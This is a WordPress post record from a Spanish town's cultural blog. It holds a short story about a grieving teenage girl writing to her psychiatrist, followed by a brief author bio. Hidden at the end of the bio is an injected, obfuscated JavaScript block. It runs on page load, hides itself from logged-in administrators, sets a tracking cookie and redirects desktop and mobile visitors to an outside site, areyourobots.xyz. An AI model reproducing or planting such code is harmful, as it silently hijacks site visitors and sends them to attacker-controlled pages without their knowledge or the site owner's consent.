{"id":1337,"date":"2015-10-05T11:53:42","date_gmt":"2015-10-05T11:53:42","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=1337"},"modified":"2015-10-05T11:53:42","modified_gmt":"2015-10-05T11:53:42","slug":"para-el-sr-alonso","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2015\/10\/05\/para-el-sr-alonso\/","title":{"rendered":"PARA EL SR. ALONSO"},"content":{"rendered":"<p>Me llamo Rebeca y tengo 14 a\u00f1os. Me considero una ni\u00f1a normal aunque quiz\u00e1 un poco inquieta. Vivo en mi mundo intentando apartarme de los problemas y de la tristeza aunque ellos a veces consiguen alcanzarme, por ejemplo, cuando me peleo con mis amigas. Yo creo que es algo irremediable pero ellas intentan hacerme creer lo contrario y hacen que me sienta tan mal que incluso acabo llorando.<\/p>\n<p><!--more--><\/p>\n<p><em>-\u00bfQu\u00e9 te pasa hija? Te noto algo distante-Dice mi madre preocupada.<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 -Nada\u2026 me he enfadado con mis amigas\u2026<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 -Oh, \u00bfQu\u00e9 ha pasado? \u00bfAlgo grave?<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 -No, mam\u00e1 no te preocupes, s\u00f3lo son tonter\u00edas\u2026<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 -Bueno entonces no est\u00e9s triste, ya se arreglar\u00e1.<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Y con esa \u00faltima frase y un beso en la frente consigue tranquilizarme y hace que me sienta mejor. As\u00ed es mi madre, tan atenta con todo y con todos que parece que nunca se dedica tiempo a ella. La verdad es que yo ocupo la mayor parte de su tiempo, pero es la responsabilidad que debes adquirir cuando tienes hijos \u00bfno? O por lo menos eso es lo que yo pienso.<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Mi padre es distinto, se preocupa por m\u00ed pero lo hace de otro modo. Es atento conmigo en algunos aspectos, por ejemplo cuando estamos a solas y hablamos de un mont\u00f3n de temas que a los dos nos parecen interesantes.<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 -No te agobies, Rebeca, todav\u00eda tienes tiempo.<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 -S\u00ed, pap\u00e1, pero me gustar\u00eda saberlo ya para tener las cosas claras desde el principio.<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 -En mi opini\u00f3n deber\u00edas ir por el camino de las ciencias, se te dan realmente bien.<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 -La verdad es que s\u00ed, pero a\u00fan no lo tengo muy claro.<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 -Pues pi\u00e9nsatelo mejor y cuando tengas las ideas m\u00e1s claras hablamos \u00bfte parece?<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 -Vale pap\u00e1, muchas gracias.<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Mi padre me ayuda mucho. Me da unos consejos muy buenos, pero no porque me ayuden a solucionar mis problemas r\u00e1pido, sino porque me hacen pensar para poder hallar una soluci\u00f3n l\u00f3gica.<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Mi hermano Eduardo, o Edu como yo le llamo, es m\u00e1s distante conmigo pero eso no quiere decir que no me entienda con \u00e9l. Es bueno, comprensivo, amable y cercano. Pero tambi\u00e9n he de reconocer que de vez en cuando nos peleamos. Pero ya sea por una cosa o por otra al final acabamos perdon\u00e1ndonos mutuamente. Cu\u00e1nto me gustar\u00eda poder re\u00f1ir de nuevo con \u00e9l para a continuaci\u00f3n hacer las paces y sellar esa bonita reconciliaci\u00f3n con un abrazo\u2026<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Tengo dos mejores amigas que, por suerte, me comprenden de maravilla. Rosa o Rosi como a m\u00ed me gusta llamarla, es muy alocada y divertida. Lo que m\u00e1s me gusta de ella es que es capaz de sacarme una sonrisa en el peor de los momentos, aunque a veces sea yo la que tenga que adoptar ese papel con mi amiga. Creo que Rosi me aporta mucha vitalidad y una pizca de locura y me ayuda a ver la vida desde otra perspectiva que, como no, es mucho m\u00e1s divertida. <\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Marta, mi otra mejor amiga, no tiene el mismo car\u00e1cter despierto de Rosi, creo que hasta podr\u00eda decir que son polos opuestos. Ella est\u00e1 m\u00e1s centrada y es la que suele tomar las decisiones importantes que nos incumben a las tres. Pero en realidad solo adquiere esta personalidad en los meses de instituto. En verano se vuelve loca ,es decir, una persona totalmente distinta. \u00abUna Marta nueva\u00b4\u00b4<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Yo soy una persona alegre que tiene siempre una sonrisa amable preparada para todo el que la quiera. Esta soy yo y esta es mi vida resumida en menos de dos p\u00e1ginas, espero que le sirva Sr Alonso.<\/em><\/p>\n<p><em>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 FDO.: Rebeca Salinas <\/em><\/p>\n<p>Y as\u00ed, satisfecha de m\u00ed misma, acabo la redacci\u00f3n que me obliga a hacer mi psiquiatra todos los meses, seg\u00fan \u00e9l para ver c\u00f3mo va cambiando mi punto de vista desde que comenzamos la terapia. Voy a su consulta desde que mi hermano muri\u00f3. Lo pas\u00e9 muy mal: no quer\u00eda salir de casa, no com\u00eda, lo que me produjo una grave enfermedad, y lloraba a todas horas. En esta situaci\u00f3n, mis padres decidieron que lo mejor era que visitara al \u00abloquero\u00b4\u00b4. Al principio me negu\u00e9 rotundamente, pero conforme avanzaban los d\u00edas me daba cuenta de que era por mi bien y que a lo mejor me serv\u00eda de algo, as\u00ed que finalmente acced\u00ed. Llevo 3 meses con \u00e9l y la verdad es que he mejorado much\u00edsimo, ya hasta casi puedo entrar en la habitaci\u00f3n de Edu sin derrumbarme por la tristeza. Entro sin llamar a la puerta y me dedico a toquetear algunas de sus cosas, cojo su ropa e inspiro su aroma. Todav\u00eda huele a \u00e9l, a su pelo a su piel, a su perfume\u2026 Y as\u00ed soy capaz de pasarme las horas, sin que nadie me moleste solo Edu y yo.<\/p>\n<p>Tengo una cosa clara, yo no voy al psiquiatra para olvidarme de mi hermano y as\u00ed poder ser m\u00e1s feliz, sino para que el Sr Alonso me ayude a recordarlo con amor y sobre todo sin dolor.<\/p>\n<p style=\"text-align: right\"><a href=\"http:\/\/www.verareverso.com\/wp-content\/uploads\/2014\/10\/pepa-ag\u00fcera-de-haro.jpg\"><img decoding=\"async\" class=\"alignnone wp-image-239\" src=\"http:\/\/www.verareverso.com\/wp-content\/uploads\/2014\/10\/pepa-ag\u00fcera-de-haro-300x250.jpg\" alt=\"pepa ag\u00fcera de haro\" width=\"168\" height=\"140\" \/><\/a><\/p>\n<p style=\"text-align: right\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Pepa Ag\u00fcera de Haro<\/p>\n<p style=\"text-align: right\">Mayo, 2011<\/p>\n<p style=\"text-align: right\">Tercer premio de relato corto Candil Radio 2011<\/p>\n<p>Naci\u00f3 en Vera el 26 de septiembre de 1996, estudi\u00f3 en el colegio Reyes Cat\u00f3licos y en el I.E.S. El Palmeral. Actualmente cursa segundo de Periodismo en la Universidad de Murcia.<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Me llamo Rebeca y tengo 14 a\u00f1os. Me considero una ni\u00f1a normal aunque quiz\u00e1 un poco inquieta. Vivo en mi mundo intentando apartarme de los problemas y de la tristeza aunque ellos a veces consiguen alcanzarme, por ejemplo, cuando me peleo con mis amigas. Yo creo que es algo irremediable pero ellas intentan hacerme creer &hellip; <a href=\"https:\/\/blog.vera.es\/cultura\/2015\/10\/05\/para-el-sr-alonso\/\" class=\"more-link\">Seguir leyendo <span class=\"screen-reader-text\">PARA EL SR. ALONSO<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":1338,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20],"tags":[84,85],"class_list":["post-1337","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboraciones","tag-pepa-aguera-de-haro","tag-relato-corto"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1337","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=1337"}],"version-history":[{"count":1,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1337\/revisions"}],"predecessor-version":[{"id":1339,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1337\/revisions\/1339"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/1338"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=1337"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=1337"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=1337"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}